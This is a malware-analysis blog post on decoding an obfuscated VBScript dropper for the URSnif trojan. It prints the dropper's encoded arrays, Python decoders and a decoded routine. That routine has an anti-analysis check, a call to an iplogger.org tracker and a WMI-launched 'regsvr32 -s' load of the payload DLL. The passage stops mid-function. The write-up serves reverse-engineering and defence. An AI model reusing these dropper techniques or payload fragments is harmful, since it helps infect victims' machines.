Analysis and Deobfuscation of Malicious VBScript URSnif Dropper

Introduction

On June 25, 2020, I came across the following Tweet posted by @ps66uk:

It appears that the victims received a phishing email with a link to download a ZIP file through Firefox Send. Extracting this ZIP file dropped an obfuscated VBScript file named data_90680.vbs (SHA1: c2952cbb31ee98c5c1a676e1820a3c73345083a0) on the system. Reviewing the execution of this VBScript through Anyrun suggests that it is a dropper for a URSnif malware variant. Somewhere along the execution process, the VBScript registers another file named afterbirth.rs using the native Windows regsvr32.exe command:

regsvr32.exe -s C:\Users\admin\AppData\Local\Temp\afterbirth.rs

The first assumption here is that afterbirth.rs is some sort of DLL associated with the URSnif malware, as the Tweet suggests: regsvr32.exe loads the file as a COM DLL and calls its DllRegisterServer export, and the -s switch suppresses the message boxes that would normally appear. In fact, looking at this file on VirusTotal shows that several Anti-Virus (AV) engines already classify it as URSnif. Although there is nothing especially novel about the threat itself, I did find the VBScript interesting because it was obfuscated in an effort to hide its operation from static analysis and code review. In addition, it had some Anti-VM checks to prevent it from being analyzed dynamically in a Virtual Machine (VM). After reviewing the obfuscation techniques, and with a few Python programming skills up my sleeve, I was able to decode the VBScript and reveal its operation. This blog post goes through the details of that deobfuscation process. I have also included a link to my GitHub repo where you can download the Python scripts I created for the deobfuscation. I hope you enjoy the content of this post, and feel free to provide feedback on it.

Code Review of The VBScript Dropper

As mentioned, the file data_90680.vbs is a dropper for the URSnif malware. Opening this file in any text editor makes it obvious that it is obfuscated so that its code and operation are not easily revealed. Sifting through the code, I noticed that the obfuscation follows a few patterns and has a few interesting characteristics. These characteristics are:

The use of the VB const (constant) keyword to declare static values, for example const cp = 121 or const jC = 154. The obfuscated arrays reference these names instead of literal numbers, so before an array can be decoded each name has to be replaced with the number it is equal to.

The VBScript also contains garbage remarks and code like the following:

' Ukrainian Pasadena Adelia deciduous absorptive psychopomp tack friable fantasist Melanesia duchess Cuba Fitzroy benefit Melissa hide failsafe decryption mamma aardvark ill chaplain. 5266210 uttermost quern commodity inertance Eulerian tandem complementary love phylogenetic speedboat 
' delusive festoon Schroeder calorie humdrum snapshot doff regalia simultaneous plausible, 8909491 handbook alive Hetty takeover frog sunburn PhD breakdown patrimony crawlspace gypsy mascara pastiche Damocles linoleum SCM Argentina 
' debarring pollution mountainous Bolshevist sinus MacDougall intermittent Sepoy vibrant, Ghanian sublimate significant covariant chord bona wispy disquisition olive trophic company crystal Hollingsworth reproach trompe psychoacoustic spiral diversionary festive

REM fledge mulct Pickman lazybones yah croft Sigmund ran billfold exemplar pant swishy guilt Phyllis alderman. 9476035 Blanche impugn athletic detoxify. hydrofluoric tribal. 4136893 ardent

The attacker added these to inflate the code and make it harder to interpret what the VBScript does on execution.

The VBScript also contains two different kinds of obfuscated arrays, fragmented into sections and scattered throughout the script. Example 1 and Example 2 explain each kind of obfuscated array.

Example 1:

The arrays in example 1 have no space between the values, for example [rE995,Zf]. In addition, nothing in the code after each array suggests what happens to it:

kgQs = Array(nl,VD,rE995,Zf,300,295,Vy62,wc,iY,lX,cp,Kn163,nV130,RE,wc,Ik,70,Vb,56,YF,ph,zo,ZQ,Ta,eT,tB,57,Qa,gA,mZ,FL,UH,uw,yX,xj,kA,jq10,AG,bq,xj,ZQ,HH313,ig,Pw,oF,Dt,Jf,OG599,nS,RQ,xj,ZQ,304,301,NX,58,av,mi436,HX45,ZQ,54,iM,eT,UR,iY,Yr,kA,iY,Qa,CF,vK,OG,Ta,Il,Ez,Sh,Lc,Vb,sB,tj,FP305,AK,Wb,VC,Vb,Il,lS,Cj,FV,Ig492,CF,eb,vL,ix136,fs,Ds,gn,52,wR,50,Wk,Vy62,SK,BJ,303,Pw,hn,YP,Cz,Zs,YH,RQ,YH,ig,rE995,Pt,52,kN,fO,HT,tO350,cR,wV,Yl,rE995,51,af,tH904,RQ392,ig,wV,294,fC726,Ta,iY,66,Bi,mZ,nF,RQ392,294,gp,VD,Ix,Qa,mZ,tX,fZ,66,Hp,qu,Nd,Ut,RQ,jC,CE,jq10,it,iY,CA,nt,gd,lX,VM,ly,ZQ,jC,mZ,af,61,kA,Gs,301,UR,nV,Ta,293,296,Vy,56,Dr,JS,iJ,302,UR,nV,49,ig,gn,52,Fw,58,hx,Zs,mz703,Qy,iY,Zt,49,nB,ig,Lc,fy,eT,ni,59,55,HH313,303,mZ,FV,fZ,af,Pt,YF,bK,57,CA,ay,Pr,vK,UN,ps,55,pr634,53,296,Gi,VC,VX,ph,qy350,nB,YF,YP,uk,301,hx,kN,RQ392,300,dM,300,304,wR)

In example 1, the fragmented arrays are combined to create a zip file called conspiratorial.zip. The process of combining them and the use of this zip file will be discussed later in this blog post.

Example 2:

The arrays in example 2 have a space between the values, for example [ZQ, rE995]. In addition, each declared array is followed by an ExecuteGlobal statement:

KYp = Array(ZQ, rE995, fC726, mz703, kA, jC, Yy, mi, hn, ni, EI, ET208, uk, iY, fZ, Yy, Bi, dM, Bi, VM, 59, ZQ, Bi, Vy, mz703, Zs, vL, pB, ni, mz703, mh, mz703, Rh731, vL, Bi, ni, Vy, Bi, on539, fC726, wR, Bi, gd, Vy, ET208, sq663, ZQ, gd, vL, jC, uk, Vy, jC, Yy, Zs, fc322, HT, jC, YF, Bi, ZQ, EI, hn, Vy, Bi, dM, on539, fC726, wR, Bi, gd, Vy, sq663, VM, 59, ZQ, Bi, Vy, mz703, jC, vL, vL, Bi, hn, fZ, YF, rE995, Vy, jC, fZ, Yy, mz703, mh, mz703, Zs, vL, pB, ni, fc322, on539, uk, Bi, Yy, wg, Bi, lX, Vy, HT, jC, YF, Bi, ET208, uk, iY, fZ, Yy, Bi, dM, Bi, Dt, mz703, ET208, Vw, UN, UN, mz703, pr634, mz703, ET208, ET208, bK, HH313, kN, kN, mz703, pr634, mz703, bK, bK, bK, UN, fc322, Cj, VM, mz703, af, mz703, ET208, Qh, UN, mz703, af, mz703, bK, Qh, fc322, Cj, VM, VM, VM, VM, 59, YH, mz703, AK, YF, rE995, lX, mz703, jC, Yy, AK, Bi, ni, hn, jC, fC726, YF, Bi, mz703, vL, fZ, rE995, Zs, iY, gd, ni, hn, Vy, mz703, gd, rE995, YF, Vy, jC, CF, ni, Vy, Bi, mz703, jC, Yy, wR, rE995, hn, Vy, jC, gd, Bi, mz703, nt, Bi, ni, YF, ni, Yy, mi, mz703, jC, Yy, CF, fZ, gd, ni, Vy, Bi, mz703, hn, EI, Yy, fZ, uk, hn, Bi, hn, mz703, iY, Bi, dM, jC, hn, uk, iY, Bi, vL, Bi, mz703, Zs, jC, ni, Yy, Vy, Dt, mz703, mz703, bw, UN, Cj, Yr, nS, nS, bK, mz703, 59, mZ, lX, Bi, gd, rE995, Vy, Bi, eC, YF, fZ, fC726, ni, YF, mz703, jC, vL, vL, Bi, hn, fZ, YF, rE995, Vy, jC, fZ, Yy, fc322, NX, Bi, ni, mi, fp537, YF, YF, 59, NX, mZ, iM, mz703, AK, jC, vL, Bi, dM, Bi, Yy, mz703, hn, Bi, YF, Bi, Yy, jC, Vy, Bi, mz703, uk, vL, Bi, hn, Bi, Yy, Vy, ni, Vy, jC, fZ, Yy, mz703, wR, fZ, gd, xj, Bi, EI, mz703, fC726, Bi, mi, vL, jC, mi, mi, Bi, Yy, mz703, xj, jC, Yy, xj, HH313, mz703, fC726, Bi, hn, Bi, Vy, mz703, Rh731, fZ, fZ, YF, jC, mi, Zs, Bi, mz703, cp, fZ, uk, xj, jC, Yy, hn, jC, ni, Yy, mz703, ni, YF, YF, fZ, SK, mz703, iM, ni, hn, hn, Bi, EI, fc322, mz703, mz703, UN, UN, Yr, bK, Yr, Vw, bw, mz703, Mu, ni, vL, Vy, fZ, xj, mz703, fC726, YF, Bi, mi, mz703, ni, gd, gd, vL, rE995, ni, YF, mz703, Mu, vL, ni, Yy, mi, 
fZ, Yy, mz703, fZ, rE995, Vy, YF, ni, SK, vL, EI, mz703, gd, Bi, YF, Bi, fC726, vL, ni, Vy, Bi, mz703, gd, vL, fZ, gd, iY, Bi, Vy, mz703, hn, YF, Bi, SK, mz703, iM, ni, rE995, vL, jC, gd, Bi, mz703, mi, jC, gd, xj, Bi, EI, mz703, dM, ni, Zs, Zs, fZ, Vy, EI, mz703, ZQ, rE995, hn, jC, Bi, mz703, uk, hn, EI, gd, iY, fZ, uk, fZ, dM, uk, nS, Cj, HH313, mz703, Vy, ni, gd, iY, jC, Yy, jC, mi, mz703, 59, jC, vL, vL, Bi, hn, fZ, YF, rE995, Vy, jC, fZ, Yy, fc322, Rh731, YF, fZ, hn, Bi, 59, YH, mz703, hn, Vy, rE995, fC726, mz703, SK, jC, hn, Bi, ni, gd, vL, Bi, mz703, EI, Bi, SK, fc322, mz703, mz703, kN, Cj, Cj, Yr, kN, Cj, nS, mz703, hn, fZ, gd, jC, fZ, dM, Bi, Vy, vL, EI, mz703, vL, Bi, YF, jC, hn, iY, fc322, mz703, ni, vL, Vy, jC, AK, ni, gd, Vy, mz703, ni, vL, fZ, rE995, hn, Bi, mz703, iM, ni, vL, gd, Bi, YF, mz703, Mu, YF, rE995, dM, fc322, mz703, iY, jC, YF, Vy, mz703, YF, fZ, Wb, Bi, Yy, Zs, Bi, mz703, gd, Bi, vL, Vy, ni, jC, Yy, fc322, mz703, uk, Bi, Bi, vL, mz703, 59, ZQ, Bi, Vy, mz703, Zs, vL, pB, ni, mz703, mh, mz703, Kq, fZ, Vy, iY, jC, Yy, Zs, 59, NX, mZ, iM, mz703, mi, rE995, fC726, jC, Vy, ni, fC726, YF, Bi, mz703, gd, fZ, rE995, Yy, Vy, Bi, vL, hn, jC, Yy, xj, mz703, eC, iY, ni, Yy, ni, mz703, YF, ni, SK, dM, ni, Yy, mz703, ps, fC726, Yy, Dt, mz703, mi436, Bi, vL, jC, gd, YF, Bi, hn, mz703, jC, Yy, ni, gd, gd, rE995, vL, ni, Vy, Bi, mz703, dM, Bi, Vy, jC, Bi, vL, mz703, jC, Yy, CF, fZ, jC, gd, Bi, mz703, gd, iY, ni, dM, fZ, dM, jC, YF, Bi, mz703, ni, vL, gd, gd, fZ, hn, jC, Yy, Bi, mz703, iY, ni, EI, SK, ni, vL, mi, mz703, fC726, jC, ni, Yy, gd, fZ, mz703, 59, ZQ, Bi, Vy, mz703, jC, vL, vL, Bi, hn, fZ, YF, rE995, Vy, jC, fZ, Yy, mz703, mh, mz703, Kq, fZ, Vy, iY, jC, Yy, Zs, 59, mZ, Yy, mi, mz703, ZQ, rE995, fC726, 59)
ExecuteGlobal(theme(KYp)):

In example 2, each array is followed by an ExecuteGlobal statement, which executes the decoded content of the array as VBScript code right after the array is declared. Inside the ExecuteGlobal call there is another call to the theme function, which is the wrapper that turns the array into the code string ExecuteGlobal runs. At line 82 (in the VBScript when reviewing through the editor), we can see this function:

Function theme(caprice)
for whether = lbound(caprice) to ubound(caprice)
mUb = mUb & ChrW(caprice(whether) - (((70 + 23.0) + 458.0) - (64 + 438.0)))
REM meaningful, spinal felon quirky theist monarchy offertory922, kickback burglary. 3545584 innocent Mayo Scarborough, fluorite Lenny Nippon. hong carcass, cambric 
Next
theme = mUb
End Function

In a nutshell, this function turns the numbers in the array back into text. The expression (((70 + 23.0) + 458.0) - (64 + 438.0)) evaluates to 49, so each element of the array has 49 subtracted from it, and ChrW turns the result into the character with that code point. The characters are concatenated into the string mUb, which the function returns; ExecuteGlobal then runs that string as VBScript. Let's go through one example to emphasize this process. Here is one of the arrays from the VBScript code:

RrrtMa = Array(HT, rE995, Yy, gd, Vy, jC, fZ, Yy, mz703, uk, ni, Vy, gd, iY, SK, fZ, vL, xj, ET208, Yy, fZ, Yy, gd, iY, ni, YF, ni, Yy, Vy, Dt, mz703, ZQ, RE, VM, 59, Rh, jC, dM, mz703, Yy, ps, Vy, Dt, mz703, lX, Wk, HH313, Vw, Vw, 59, YH, mz703, Zs, vL, jC, dM, Bi, Dt, mz703, uk, jC, Bi, gd, Bi, mz703, ni, Vy, vL, fZ, uk, iY, EI, mz703, jC, gd, Bi, YF, ni, Yy, mi, mz703, fC726, jC, gd, fZ, Yy, Yy, Bi, gd, Vy, Bi, mi, mz703, gd, fZ, dM, uk, ni, gd, Vy, jC, AK, EI, mz703, cp, jC, vL, fZ, hn, iY, jC, dM, ni, mz703, SK, ni, xj, Bi, mz703, ni, YF, YF, Bi, Zs, Bi, bK, nS, kN, mz703, ZQ, ZQ, mZ, mz703, it, fZ, uk, uk, Bi, vL, hn, mz703, iY, Bi, ni, vL, Vy, vL, Bi, Yy, mi, jC, Yy, Zs, mz703, Vy, iY, Bi, fZ, YF, fZ, Zs, EI, mz703, kA, jC, fZ, Yy, Bi, YF, mz703, AK, YF, fZ, rE995, vL, mz703, jC, dM, dM, Bi, vL, hn, Bi, mz703, rE995, Yy, ni, vL, EI, mz703, mi436, vL, fZ, gd, EI, fZ, Yy, mz703, iY, fZ, fZ, hn, Bi, Zs, fZ, SK, mz703, Bi, dM, fC726, Bi, vL, mz703, rE995, uk, Zs, vL, ni, mi, Bi, mz703, mi, Bi, gd, fZ, YF, YF, jC, dM, ni, Vy, Bi, mz703, gd, iY, fZ, hn, Bi, mz703, vL, Bi, CF, fZ, gd, ni, fC726, YF, Bi, mz703, CF, fZ, SK, mz703, fp537, vL, gd, ni, mi, jC, ni, mz703, iM, fZ, Yy, Vy, jC, gd, Bi, YF, YF, fZ, Dt, mz703, mz703, kN, Qh, Qh, nS, nS, HH313, mz703, hn, uk, YF, jC, Yy, Vy, mz703, Rh, vL, Bi, EI, AK, rE995, hn, hn, Dt, mz703, Rh, vL, ni, gd, fZ, Yy, jC, ni, Yy, mz703, gd, fZ, jC, Yy, gd, jC, mi, Bi, Yy, Vy, ni, YF, fc322, mz703, mz703, kN, Vw, Vw, UN, Vw, bw, bK, mz703, Bi, YF, Bi, Zs, EI, mz703, SK, ni, vL, uk, mz703, jC, Yy, gd, fZ, Yy, hn, Bi, cR, rE995, Bi, Yy, Vy, jC, ni, YF, mz703, Bi, lX, Vy, vL, ni, CF, ni, Zs, ni, Yy, Wb, ni, mz703, 59, ZQ, Bi, Vy, mz703, Yy, ps, Vy, mz703, mh, mz703, Rh731, vL, Bi, ni, Vy, Bi, on539, fC726, wR, Bi, gd, Vy, ET208, sq663, ZQ, gd, vL, jC, uk, Vy, jC, Yy, Zs, fc322, HT, jC, YF, Bi, ZQ, EI, hn, Vy, Bi, dM, on539, fC726, wR, Bi, gd, Vy, sq663, VM, 59, YH, mz703, uk, rE995, vL, jC, Vy, ni, Yy, jC, gd, mz703, hn, xj, Bi, 
Vy, gd, iY, uk, ni, mi, mz703, Vy, fZ, ni, mi, EI, mz703, NX, fZ, Bi, Yy, Vy, Zs, Bi, Yy, mz703, fC726, fZ, fZ, xj, hn, Vy, fZ, vL, Bi, mz703, hn, uk, vL, fZ, gd, xj, Bi, Vy, Dt, mz703, hn, fZ, vL, vL, fZ, SK, AK, rE995, YF, mz703, iM, ni, EI, AK, YF, fZ, SK, Bi, vL, mz703, 59, ZQ, Bi, Vy, mz703, lX, Wk, HH313, Vw, Vw, mz703, mh, mz703, Yy, ps, Vy, fc322, Rh731, vL, Bi, ni, Vy, Bi, wg, Bi, lX, Vy, HT, jC, YF, Bi, ET208, Yy, fZ, Yy, gd, iY, ni, YF, ni, Yy, Vy, Dt, mz703, wg, vL, rE995, Bi, VM, 59, Rh, jC, dM, mz703, AK, YF, ni, Yy, Zs, Bi, wc, mz703, AK, YF, ni, Yy, Zs, Bi, mz703, mh, mz703, ET208, ET208, UN, HH313, mz703, af, mz703, ET208, ET208, Cj, VM, mz703, af, mz703, UN, bK, bw, fc322, Cj, VM, VM, mz703, pr634, mz703, ET208, Vw, bw, Vw, mz703, pr634, mz703, Vw, Vw, fc322, Cj, VM, VM, 59, Rh, jC, dM, mz703, gp, Rh, hn, kA, wc, mz703, gp, Rh, hn, kA, mz703, mh, mz703, ET208, ET208, Vw, mz703, af, mz703, ET208, bK, nS, mz703, af, mz703, ET208, pr634, ET208, Qh, Vw, bw, UN, mz703, pr634, mz703, Qh, Vw, Yr, HH313, fc322, Cj, VM, VM, VM, VM, mz703, pr634, mz703, kN, UN, fc322, Cj, VM, 59, HT, fZ, vL, mz703, mZ, ni, gd, iY, mz703, dM, pB, fC726, mz703, ps, Yy, mz703, ZQ, RE, 59, NX, ni, Yy, mi, fZ, dM, jC, Wb, Bi, 59, AK, YF, jC, Yy, Zs, mz703, mh, mz703, ps, Yy, Vy, ET208, ET208, AK, YF, ni, Yy, Zs, Bi, pr634, gp, Rh, hn, kA, af, Yr, VM, vR, NX, Yy, mi, af, gp, Rh, hn, kA, VM, 59, ps, AK, mz703, AK, YF, jC, Yy, Zs, mz703, tn, mz703, ET208, ET208, ET208, Vw, bK, mz703, af, mz703, HH313, UN, fc322, Cj, VM, mz703, af, mz703, ET208, pr634, Yr, bK, fc322, Cj, VM, VM, mz703, af, mz703, ET208, nS, mz703, af, mz703, HH313, fc322, Cj, VM, VM, mz703, wg, iY, Bi, Yy, 59, lX, Wk, HH313, Vw, Vw, fc322, oF, vL, jC, Vy, Bi, kA, jC, Yy, Bi, ET208, dM, pB, fC726, VM, 59, mZ, YF, hn, Bi, ps, AK, mz703, AK, YF, jC, Yy, Zs, mz703, tX, mz703, ET208, nS, UN, mz703, af, mz703, ET208, Vw, UN, mz703, af, mz703, ET208, pr634, ET208, bw, Cj, mz703, pr634, mz703, ET208, Qh, HH313, HH313, 
mz703, pr634, mz703, Qh, bK, kN, fc322, Cj, VM, VM, VM, VM, VM, mz703, fp537, Yy, mi, mz703, AK, YF, jC, Yy, Zs, mz703, tn, mz703, ET208, nS, UN, mz703, af, mz703, ET208, Vw, UN, mz703, af, mz703, ET208, pr634, ET208, bw, Cj, mz703, pr634, mz703, ET208, Qh, HH313, HH313, mz703, pr634, mz703, Qh, bK, kN, fc322, Cj, VM, VM, VM, VM, VM, mz703, wg, iY, Bi, Yy, 59, lX, Wk, HH313, Vw, Vw, fc322, oF, vL, jC, Vy, Bi, mz703, dM, pB, fC726, mz703, af, mz703, sq663, wc, sq663, 59, mZ, YF, hn, Bi, 59, lX, Wk, HH313, Vw, Vw, fc322, oF, vL, jC, Vy, Bi, mz703, dM, pB, fC726, 59, lX, Wk, HH313, Vw, Vw, fc322, oF, vL, jC, Vy, Bi, Mu, YF, ni, Yy, xj, kA, jC, Yy, Bi, hn, ET208, ET208, HH313, Vw, mz703, pr634, mz703, ET208, ET208, bw, Qh, Cj, HH313, mz703, pr634, mz703, ET208, Yr, Yr, UN, nS, Qh, mz703, pr634, mz703, Qh, HH313, Vw, nS, fc322, Cj, VM, VM, mz703, pr634, mz703, nS, bK, HH313, fc322, Cj, VM, VM, VM, 59, mZ, Yy, mi, mz703, ps, AK, 59, Kq, Bi, lX, Vy, 59, lX, Wk, HH313, Vw, Vw, fc322, Rh731, YF, fZ, hn, Bi, 59, mZ, Yy, mi, mz703, HT, rE995, Yy, gd, Vy, jC, fZ, Yy, 59)
ExecuteGlobal(theme(RrrtMa))

I have created a Python script to help decode these arrays. It declares every const from the VBScript as a Python variable, so an array pasted in from the script resolves to the right numbers, and then applies the same subtraction of 49 that theme performs before converting each value to a character:

af = 92
AG = 233
AK = 151
av = 113
aX = 259
ax809 = 272
ay = 281
aZ = 211
Bi = 150
bi563 = 195
BJ = 239
Bj418 = 288
bK = 103
bO = 189
bq = 206
bw = 100
bX = 145
CA = 191
CE = 185
CF = 167
Cj = 97
Cn = 144
<SNIP SNIP>
xj = 156
xl = 196
YA = 216
YF = 157
YH = 88
Yl = 225
YP = 269
Yr = 98
yX = 210
Yy = 159
Zf = 283
zo = 205
ZQ = 132
Zs = 152
Zt = 250

def convert(array):
	Remember = []
	for line in array:
		if line:
			line = (int(line) - (((70 + 23.0) + 458.0) - (64 + 438.0)))
			Remember.append(int(line))

	RememberTwo = []
	for line in Remember:
		newline = chr(int(line))
		RememberTwo.append(newline)
	return RememberTwo

RememberAll = []
SaveToFile = open('output.vbs', 'w')
array = [HT, rE995, Yy, gd, Vy, jC, fZ, Yy, mz703, RE, Wb, cp, ET208, VM, 59, ps, AK, mz703, ET208, ps, Yy, ZQ, Vy, vL, ET208, oF, ZQ, gd, vL, jC, uk, Vy, fc322, ZQ, gd, vL, jC, uk, Vy, Kq, ni, dM, Bi, Dt, mz703, sq663, wg, mZ, ZQ, wg, ps, Kq, eC, sq663, VM, mz703, tX, mz703, Cj, VM, mz703, wg, iY, Bi, Yy, 59, YH, mz703, mZ, fC726, Bi, Yy, mz703, mi436, iY, jC, YF, YF, jC, uk, mz703, dM, jC, dM, Bi, hn, jC, hn, mz703, Mu, fZ, vL, jC, hn, mz703, dM, ni, Yy, uk, fZ, SK, Bi, vL, fc322, mz703, Yy, ni, Vy, jC, fZ, Yy, mz703, ni, Zs, rE995, Bi, mz703, gd, iY, jC, Yy, gd, iY, mz703, iY, rE995, iY, mz703, fZ, uk, uk, vL, Bi, hn, hn, fZ, vL, mz703, iM, fZ, iY, ni, dM, dM, Bi, mi, ni, Yy, mz703, uk, fZ, YF, YF, fZ, gd, xj, mz703, Yy, ni, vL, gd, fZ, Vy, jC, gd, fc322, mz703, ZQ, ni, dM, mz703, gd, jC, vL, gd, YF, Bi, Vy, mz703, Rh731, ni, vL, uk, ni, Vy, iY, jC, ni, mz703, gd, iY, ni, Yy, Zs, Bi, mz703, xj, Yy, Bi, Bi, YF, mz703, dM, Bi, hn, Vy, jC, Wb, fZ, mz703, uk, Bi, Yy, Vy, Bi, gd, fZ, hn, Vy, ni, YF, Dt, mz703, jC, Yy, AK, YF, Bi, lX, jC, fC726, YF, Bi, mz703, hn, gd, iY, fZ, fZ, YF, dM, ni, vL, dM, mz703, ni, gd, Vy, jC, Yy, jC, mi, Bi, mz703, Kq, fZ, Bi, Vy, iY, Bi, vL, jC, ni, Yy, mz703, on539, vL, Vy, Bi, Zs, ni, Dt, mz703, uk, jC, Yy, lX, Vy, Bi, vL, mz703, 59, mZ, lX, jC, Vy, mz703, HT, rE995, Yy, gd, Vy, jC, fZ, Yy, 59, mZ, Yy, mi, mz703, ps, AK, 59, uk, vL, jC, Yy, gd, jC, uk, ni, YF, ET208, sq663, iY, Vy, Vy, uk, hn, wc, sF531, sF531, jC, uk, YF, fZ, Zs, Zs, Bi, vL, fc322, fZ, vL, Zs, sF531, Yr, fC726, mi436, UN, bK, HH313, sq663, VM, 59, YH, mz703, hn, jC, dM, jC, YF, jC, Vy, rE995, mi, Bi, mz703, Bi, vL, Zs, ni, Vy, jC, CF, Bi, mz703, jC, hn, bK, HH313, kN, mz703, YF, fZ, fC726, ni, vL, mz703, YF, ni, Vy, jC, Vy, rE995, mi, jC, Yy, ni, YF, mz703, iY, Bi, vL, Bi, ni, AK, Vy, Bi, vL, mz703, kA, ni, Zs, rE995, Bi, vL, vL, Bi, mz703, vL, jC, mi, jC, gd, rE995, YF, Bi, fc322, mz703, gd, fZ, CF, ni, vL, jC, ni, Yy, Vy, kN, nS, mz703, AK, vL, rE995, jC, Vy, AK, 
rE995, YF, mz703, Zs, vL, jC, hn, Vy, dM, jC, YF, YF, mz703, mi436, ni, hn, fZ, mz703, Vy, vL, Bi, Yy, mi, mz703, iY, EI, uk, fZ, Vy, iY, Bi, Vy, jC, gd, fc322, mz703, mz703, Yr, nS, bw, UN, Qh, Vw, Cj, mz703, uk, ni, mi, vL, Bi, mz703, mi, fZ, SK, Yy, uk, fZ, rE995, vL, mz703, eC, rE995, Vy, Bi, Yy, fC726, Bi, vL, Zs, fc322, mz703, YF, jC, Vy, dM, rE995, hn, mz703, CF, Bi, vL, ni, gd, jC, Vy, EI, mz703, jC, Yy, mi, jC, Zs, Bi, Yy, Vy, mz703, ZQ, Vy, rE995, Vy, Vy, Zs, ni, vL, Vy, mz703, hn, Vy, ni, rE995, Yy, gd, iY, mz703, NX, rE995, mi, EI, mz703, gd, iY, jC, gd, xj, Bi, Yy, mz703, SK, iY, jC, vL, mz703, Vy, iY, vL, fZ, dM, fC726, fZ, hn, jC, hn, mz703, hn, fZ, dM, fC726, Bi, vL, mz703, Wb, Bi, hn, Vy, EI, mz703, jC, dM, uk, fZ, hn, hn, jC, fC726, YF, Bi, mz703, uk, vL, EI, mz703, hn, fZ, rE995, Vy, iY, uk, ni, SK, mz703, mi, fZ, hn, Bi, mz703, ZQ, rE995, hn, jC, Bi, bK, UN, Qh, mz703, dM, Bi, YF, ni, Yy, gd, iY, fZ, YF, EI, mz703, 59, ZQ, Bi, Vy, mz703, Bi, EI, Bi, YF, jC, mi, ZQ, Bi, vL, CF, jC, gd, Bi, mz703, mh, mz703, eC, Bi, Vy, on539, fC726, wR, Bi, gd, Vy, ET208, sq663, SK, jC, Yy, dM, Zs, dM, Vy, hn, wc, oF, jC, Yy, bw, Vw, Cn, mi436, vL, fZ, gd, Bi, hn, hn, sq663, VM, 59, NX, mZ, iM, mz703, dz, ni, YF, Bi, mz703, dM, ni, hn, hn, jC, AK, Dt, mz703, mz703, nS, nS, kN, Vw, nS, HH313, bK, mz703, iY, EI, uk, Bi, vL, fC726, fZ, YF, fZ, jC, mi, ni, YF, mz703, Vy, iY, Bi, vL, Bi, Vy, fZ, mz703, iY, fZ, hn, Vy, Bi, YF, vL, EI, mz703, EI, fZ, rE995, vL, hn, Bi, YF, CF, Bi, hn, mz703, fZ, gd, Vy, jC, YF, YF, jC, fZ, Yy, mz703, 59, Bi, EI, Bi, YF, jC, mi, ZQ, Bi, vL, CF, jC, gd, Bi, fc322, Rh731, vL, Bi, ni, Vy, Bi, mz703, sq663, vL, Bi, Zs, hn, CF, vL, bw, Vw, sq663, mz703, af, mz703, sq663, mz703, pr634, hn, mz703, sq663, mz703, af, mz703, Wk, mi436, jC, mz703, af, mz703, sq663, ni, AK, Vy, Bi, vL, fC726, jC, vL, Vy, iY, fc322, vL, hn, sq663, mz703, af, mz703, sq663, sq663, 59, uk, Bi, hn, Vy, YF, Bi, 59, mZ, Yy, mi, mz703, HT, rE995, Yy, gd, Vy, jC, fZ, Yy, 59] 
array = convert(array)
array = (''.join(array) + '\n')
RememberAll.append(array)
for line in RememberAll:
	#if "REM" not in line:
	print(line)
	SaveToFile.write(line)
SaveToFile.close()

The deobfuscated results should look like the following code:

Function VzH()
If (InStr(WScript.ScriptName, "TESTING") > 0) Then
' Eben Phillip mimesis Boris manpower. nation ague chinch huh oppressor Mohammedan pollock narcotic. Sam circlet Carpathia change kneel mestizo pentecostal, inflexible schoolmarm actinide Noetherian Ortega, pinxter
Exit Function
End If
principal("https://iplogger.org/1bP467")
' similitude ergative is675 lobar latitudinal hereafter Laguerre ridicule. covariant59 fruitful gristmill Paso trend hypothetic. 1934820 padre downpour Gutenberg. litmus veracity indigent Stuttgart staunch Rudy chicken whir thrombosis somber zesty impossible pry southpaw dose Susie648 melancholy
Set eyelidService = GetObject("winmgmts:Win32_Process")
REM Yale massif, 9952976 hyperboloidal thereto hostelry yourselves octillion
eyelidService.Create "regsvr32" + " -s " + JPi + "afterbirth.rs" + ""
pestle
End Function

Using this method you can convert all the arrays in the obfuscated script into meaningful code that is much easier to read and to understand what the VBScript does on execution. Please refer to the following GitHub link, where I uploaded the script I created to do this for all arrays:

https://github.com/taogoldi/Decoders/blob/master/ursnif_afterbirth/convertToVBScript.py
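The script above works because every const declaration was copied into the Python source by hand. As an added example (my own code, not the script from the GitHub repo above), the following parses the const declarations, the Array(...) declarations and the ExecuteGlobal(theme(...)) calls straight out of the VBScript text, resolves each array element to its number, and applies the same subtraction of 49 as theme. The sample script embedded in it is constructed in the same shape as data_90680.vbs; its const names and values are made up and decode to a harmless MsgBox line.

```python
import re

# theme() subtracts (((70 + 23.0) + 458.0) - (64 + 438.0)) from every element,
# which is simply 49.
THEME_OFFSET = int(((70 + 23.0) + 458.0) - (64 + 438.0))

# Junk comment lines ("' ..." and "REM ...") that only inflate the script.
COMMENT_RE = re.compile(r"^[ \t]*(?:'|REM\b).*$", re.IGNORECASE | re.MULTILINE)
# const NAME = NUMBER
CONST_RE = re.compile(r"^[ \t]*const[ \t]+(\w+)[ \t]*=[ \t]*(\d+)\s*$",
                      re.IGNORECASE | re.MULTILINE)
# NAME = Array(...)   (elements never contain a closing parenthesis)
ARRAY_RE = re.compile(r"^[ \t]*(\w+)[ \t]*=[ \t]*Array\(([^)]*)\)",
                      re.IGNORECASE | re.MULTILINE)
# ExecuteGlobal(theme(NAME))  -- the arrays that are actually run as code
EXEC_RE = re.compile(r"ExecuteGlobal\s*\(\s*theme\s*\(\s*(\w+)\s*\)\s*\)", re.IGNORECASE)


def strip_comments(script):
    """Remove the ' and REM junk lines the obfuscator inserted."""
    return COMMENT_RE.sub("", script)


def parse_consts(script):
    """Map every `const NAME = NUMBER` declaration to its integer value."""
    return {name: int(value) for name, value in CONST_RE.findall(script)}


def parse_arrays(script):
    """Map every `NAME = Array(...)` declaration to its raw elements
    (const names or integer literals, whitespace stripped)."""
    arrays = {}
    for name, body in ARRAY_RE.findall(script):
        arrays[name] = [e.strip() for e in body.split(",") if e.strip()]
    return arrays


def resolve(element, consts):
    """An element is either an integer literal or the name of a const."""
    if element.isdigit():
        return int(element)
    if element not in consts:
        raise KeyError(f"no const declaration for {element!r}")
    return consts[element]


def theme(elements, consts, offset=THEME_OFFSET):
    """Python equivalent of the dropper's theme(): resolve each element,
    subtract the offset and join the resulting characters."""
    return "".join(chr(resolve(e, consts) - offset) for e in elements)


def decode_all(script):
    """Decode every Array(...) in the script, executed or not (the example 1
    arrays decode to zip bytes rather than readable code)."""
    clean = strip_comments(script)
    consts = parse_consts(clean)
    return {name: theme(elems, consts) for name, elems in parse_arrays(clean).items()}


def deobfuscate(script):
    """Decode only the arrays handed to ExecuteGlobal(theme(...)), i.e. the
    recovered VBScript source, keyed by array name in execution order."""
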